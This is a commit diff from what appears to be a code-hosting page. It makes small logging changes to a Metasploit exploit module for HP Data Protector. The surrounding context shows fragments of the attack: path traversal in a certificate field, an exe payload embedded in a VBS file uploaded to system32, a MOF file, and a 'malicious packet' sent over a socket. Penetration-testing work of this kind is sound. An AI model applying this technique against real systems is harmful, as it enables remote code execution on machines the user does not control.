Add minor clean up
parent
f3c912bd32
commit
eaf1b0caf6
|
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
print_status("HP Data Protector version #{fingerprint}")
|
||||
print_status("#{peer} - HP Data Protector version #{fingerprint}")
|
||||
|
||||
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
|
||||
minor = $1.to_i
|
||||
|
@ -92,6 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
|
||||
mof = generate_mof(mof_name, vbs_name)
|
||||
|
||||
# We can't upload binary contents, so embedding the exe into a VBS.
|
||||
print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}")
|
||||
res = upload_file("windows\\system32\\#{vbs_name}", vbs)
|
||||
|
||||
|
@ -158,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
|
||||
contents # Certificate contents
|
||||
])
|
||||
print_status("Sending malicious packet with opcode 42...")
|
||||
vprint_status("#{peer} - Sending malicious packet with opcode 42...")
|
||||
sock.put(pkt)
|
||||
res = sock.get_once
|
||||
disconnect
|
||||
|
|
Loading…
Reference in New Issue